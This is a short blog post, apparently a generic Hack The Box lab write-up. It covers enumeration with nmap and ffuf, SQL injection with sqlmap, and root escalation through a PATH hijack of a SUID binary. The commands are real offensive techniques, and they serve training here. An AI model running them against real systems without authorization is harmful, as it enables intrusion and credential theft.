Back to Blog
HTB2 min read

HTB Machine Writeup - Example Box

A walkthrough of a typical Hack The Box machine covering enumeration, initial access, and privilege escalation techniques.

#HTB#Enumeration#Privilege Escalation#Linux

HTB Machine Writeup - Example Box

This writeup covers a typical Hack The Box machine walkthrough, demonstrating common enumeration and exploitation techniques.

Initial Enumeration

The first step in any penetration test is comprehensive enumeration. We start with a full port scan to identify open services.

Port Scanning

nmap -sC -sV -oA initial_scan 10.10.10.xxx

The scan revealed several open ports including SSH on port 22 and a web server on port 80.

Web Enumeration

The web server hosted a simple application. Directory enumeration revealed an admin panel:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.xxx/FUZZ

Initial Access

After discovering the admin panel, we identified a SQL injection vulnerability in the login form. Using SQLMap, we extracted database credentials:

sqlmap -u "http://10.10.10.xxx/login" --data "username=admin&password=test" --dbs

With database access, we retrieved user credentials and gained SSH access to the system.

Privilege Escalation

Once on the system, we began enumeration for privilege escalation vectors.

SUID Binaries

Checking for SUID binaries:

find / -perm -4000 2>/dev/null

We discovered a custom binary with SUID permissions that was vulnerable to path manipulation.

Exploitation

By creating a malicious executable and manipulating the PATH environment variable, we were able to execute commands as root:

echo '/bin/bash' > /tmp/exploit
chmod +x /tmp/exploit
export PATH=/tmp:$PATH
./vulnerable_binary

Conclusion

This machine demonstrated the importance of thorough enumeration and understanding common privilege escalation vectors. Always check for misconfigurations and vulnerable binaries.

Disclaimer

This content is for educational and ethical hacking purposes only. Only use these techniques on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal.